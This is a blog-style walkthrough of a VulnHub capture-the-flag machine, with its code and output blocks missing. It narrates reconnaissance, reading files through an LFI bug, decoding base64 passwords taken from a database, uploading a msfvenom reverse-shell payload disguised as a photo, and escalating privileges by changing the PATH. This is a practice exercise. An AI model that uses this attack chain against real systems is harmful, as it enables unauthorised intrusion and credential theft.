We will start from netdiscover this time ;)
After a while we should get an output file from nmap - results from our scan, below:
Checking webapp:
Ok, maybe we will need it lated. Let's try to scan the box with some command-line tools available on Kali (you can download it here if you still don't have it ;)):
Ok, nice. We have some more files/dirs to check now. Interestingly, there is a 'config.php'... but maybe it's a false-positive...;S
Checking:
not much. I was wondering if I'll get the blank output from the other results - just checking:
Ok, good.
Next, as you can see, we can do *a lot off* interesting things on this webpage, for example:
Cool, isn't it? ;>
After I spend some time (bruteforcing the password, trying to inject some weird strings in the loginform and using other and other dir[s].txt from the /usr/share/wordlists/ directory) I found that maybe I doing something wrong. I tried dirb again, like this:
I realised that in the output of nikto we've found "config.php" file :)
But after I tried to GET it like a normal URL file, there was (oh wow;]) no chance to read it. ;)
So I decide to use one trick I used in other CTF, to scan webroot of that webapp again.
And then I found my precious:
Checking (base64 -d ):
Thank you Santa.
Checking:
Details:
;>
Ok, more details:
Cool, looks like a base64. I will use Burp Suite to "decode" that strings from pass column. Here we go:
Checking credentials, aaaand...
Checking:
Challenge accepted ;>
I decided to prepare a shell script (using msfvenom) to generate payload(s) for our reverse-shell. To use it, in 2nd console window I prepared a meterpreter to catch the connection to our Kali host:
Hm... yeah - venome.sh - it is a simple script in bash I created to automate a bit generating of msf-based reverse shells... maybe you will find it useful. ;) So, let's try to upload our new photo-file :)
Checking the source:
Unfortunately I wasn't able to access the file (to run it in our meterpreter in Kali), so I decided to get back to the LFI bug and read (base64 -d(ecoded)) source files:
More:
Ok, cool. Checking:
Great :)
Time for some recon:
And we landed here:
:) So I tried to su to other user(s found during SQL journey;)):
And I found:
Checking:
Ok, so it looks like we need to update the PATH :)
Checking:
Still no access... Checking:
Still no access... Next:
Good!
So:
Great! :)
I must admit that it was a very interesting CTF.
Kudos for @Claor for preparing the game! Big thanks also goes to VulnHub for hosting.
See you next time! ;)
Cheers
o/
Brak komentarzy:
Prześlij komentarz